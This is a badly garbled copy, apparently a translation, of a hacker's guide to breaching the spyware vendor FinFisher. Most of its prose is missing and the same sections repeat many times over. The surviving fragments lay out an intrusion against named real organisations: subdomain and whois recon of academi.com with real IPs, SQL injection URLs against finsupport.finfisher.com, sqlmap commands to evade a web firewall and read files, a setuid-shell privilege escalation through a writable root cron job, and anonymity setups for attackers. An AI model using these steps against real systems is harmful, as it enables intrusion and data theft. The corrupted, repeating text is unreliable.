. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-
www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-
academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,
fierce.pl
,
fierce.pl -dns
- IP-. , , .
Google . ,
academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,
academiproshop.com
, .
FinFisher
finsupport.finfisher.com
whois-
finfisher.com
, " FinFisher GmbH ".
"FinFisher GmbH" inurl:domaintools
gamma-international.de
,
finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .
fierce
git-,
git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.
fierce
, ,
test.company.com
dev.company.com
, . nikto .
webserver/.svn/
,
webserver/backup/
,
webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (
index.php
, , ).
Scripts/scripts.js.php
Google:
allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:
allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap
--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport .
/BackOffice/
403 Forbidden , SQL- ( ).
print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,
print.php
, . ! MySQL . ,
magicquotes
, MySQL-
INTO OUTFILE
. ,
sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,
unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,
cron
.
webalizer
, , . ,
cron
, ,
cron
.
ls -l /etc/localtime
, 6- ,
webalizer
, , , . , , , - , , . Root- , .
, . , , .
nmap
. nse-
nfs-*
smb-*
. finsupport - -,
qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-
www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-
academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,
fierce.pl
,
fierce.pl -dns
- IP-. , , .
Google . ,
academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,
academiproshop.com
, .
FinFisher
finsupport.finfisher.com
whois-
finfisher.com
, " FinFisher GmbH ".
"FinFisher GmbH" inurl:domaintools
gamma-international.de
,
finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .
fierce
git-,
git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.
fierce
, ,
test.company.com
dev.company.com
, . nikto .
webserver/.svn/
,
webserver/backup/
,
webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (
index.php
, , ).
Scripts/scripts.js.php
Google:
allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:
allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap
--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport .
/BackOffice/
403 Forbidden , SQL- ( ).
print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,
print.php
, . ! MySQL . ,
magicquotes
, MySQL-
INTO OUTFILE
. ,
sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,
unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,
cron
.
webalizer
, , . ,
cron
, ,
cron
.
ls -l /etc/localtime
, 6- ,
webalizer
, , , . , , , - , , . Root- , .
, . , , .
nmap
. nse-
nfs-*
smb-*
. finsupport - -,
qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
